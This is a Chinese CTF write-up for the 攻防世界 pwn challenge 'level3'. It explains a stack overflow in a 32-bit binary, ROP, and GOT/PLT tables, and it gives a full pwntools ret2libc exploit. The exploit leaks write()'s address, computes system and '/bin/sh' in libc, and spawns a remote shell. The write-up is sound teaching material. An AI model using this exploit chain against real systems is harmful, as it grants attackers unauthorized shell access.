攻防世界pwn新手区题解-level3

攻防世界pwn-level3详细题解

准备工作

将附件下载下来后解压得两个文件
level3和libc_32.so.6

分别查看文件类型
level3是一个32位的ELF文件
libc_32.so.6是level3的动态链接库

so文件是Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据， .so文件就跟.dll文件差不多，就是常说的动态链接库
Linux下的.so文件时不能直接运行的,一般来讲,.so文件称为共享库

checksec命令查看level3文件保护
栈中数据不能执行，但我们可以使用ROP（面向返回编程）绕过

面向返回编程概述：
攻击者扫描已有的动态链接库和可执行文件，提取出可以利用的指令片段
接着利用栈溢出漏洞，覆盖函数返回地址，伪造函数调用栈，使其指向我们提取的内存中的指令

执行ELF文件

发现了两个字符串提示

IDA查看ELF文件

首先查看main函数（F5反汇编成c语言）
没什么特别的，除了第一行的调用函数

发现return语句中，read读入了256个内存空间

查看function()函数的栈空间
以下图片中的数据使用16进制，-0x88~0x00为程序缓冲区容量，0x00~到0x04为ebp地址，再往后是程序返回地址

很明显，read函数读入的内存空间大于function()函数的缓冲区容量，这里存在栈溢出漏洞
我们可以利用read函数的漏洞，覆盖程序的返回地址，使得程序执行我们指定的指令

查找可利用指令

shift+F12查看所有字符串
可以看到，这个level3并没有像之前一样给出system和/bin/sh的内存地址，我们需要想办法将其泄露出来

开始写exp

首先，让我们认识一下got表和plt表

GOT表
Globle offset table全局偏移量表，位于数据段，是一个每个条目是8字节地址的数组，用来存储外部函数在内存的确切地址，GOT表存储在数据段，（在IDA中是也就是.data段）可以在程序运行中被修改。

PLT表
procedure linkage table过程连接表，位于代码段，是一个每个条目是16字节内容的数组。
可以理解为plt表存储的就是got表的值的地址

我们可以通过修改got表中的地址A为我们需要利用的指令B在内存中的实际地址，使得got表中该段地址错误的指向指令B并执行

让我们先缕清攻击思路
攻击最终目标是获得/bin/sh交互界面，所以我们需要使得程序执行system(‘/bin/sh’)指令
现在已有一个栈溢出漏洞可以写入system指令获得交互界面，但我们不知道system和/bin/sh的实际地址，无法将其写入
所以我们需要先通过栈溢出漏洞泄露出system和/bin/sh的实际地址

level3已经将libc库给我们了，已知linux下默认开启ASLR地址随机化，每次程序运行时函数加载的地址都可能不一样，但幸运的是函数在动态链接库，也就是libc里的相对位置是不变的，也可以是偏移是一样的。
只要知道某个已知函数的got表地址（这里我们使用write（）函数），我们就可以利用libc推算出偏移和基址，进而推算system和/bin/sh的got表地址

EXP

以下是py代码，注释中有详细代码原理解释

RHOST='xxx.xxx.xxx.xxx'
RPORT='xxxxx'
#建立远程连接
p=remote(RHOST,RPORT)
#使用ELF执行程序
elf_level3=ELF('./level3')
elf_libc=ELF('./libc_32.so.6')
#获得write()plt表地址
write_plt=elf_level3.plt['write']
#获得write()got表地址
write_got=elf_level3.got['write']
#获得mian函数实际地址
main_addr=elf_level3.symbols['main']

#当程序执行到输出'Input:\n'时开始攻击read()函数
p.recvuntil('Input:\n')

#'a'*(0x88+0x4)：用于填充程序缓冲区及ebp地址，随便什么字符，填满就行
#p32(write_plt)：用于覆盖返回地址，使用plt调用write()函数
#p32(main_addr)：设置write()的返回地址为main()；因为这一步payload只是为了返回write()的got地址，后续的实际攻击还需要继续使用main函数的read()方法，所以write()执行完毕后需要返回到main()
#p32(0)：write()第一个参数，只要转换为p32格式就行
#p32(write_got)：返回write()got表地址，这就是这句payload需要得到的信息
#p32(4)：读入4个字节，也就是write()got表地址
payload_1=b'a'*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0)+p32(write_got)+p32(4)
p.sendline(payload_1)
#获得write()got表地址
write_got=(u32(p.recv()))

#计算libc库中的write()地址与level3的write()地址的偏差
libc_py_deviation=write_got-elf_libc.symbols['write']
#由于偏移是相同的，将偏差值加上libc库中的system地址，便得到了level3中system的实际地址
sys_addr=libc_py_deviation+elf_libc.symbols['system']
#/bin/sh在libc库的位置可以通过string命令配合管道符查看
#strings -a -t x libc_32.so.6 | grep "/bin/sh"
#计算/bin/sh的实际地址，原理和system一样
binsh_addr = libc_py_deviation + 0x15902b

#重新返回main函数，再次执行到输出'Input:\n'时，开始第二次攻击
p.recvuntil('Input:\n')
#p32(sys_addr)：覆盖返回地址，跳转到system地址
#p32(0)：覆盖system函数的返回地址，我们目的是获得/bin/sh,所以不care它返回到哪，填充4个字节就行
#p32(binsh_addr)：传入system的参数/bin/sh
payload_2=b'a'*(0x88+0x4)+p32(sys_addr)+p32(0)+p32(binsh_addr)
p.sendline(payload_2)
#获得交互界面
p.interactive()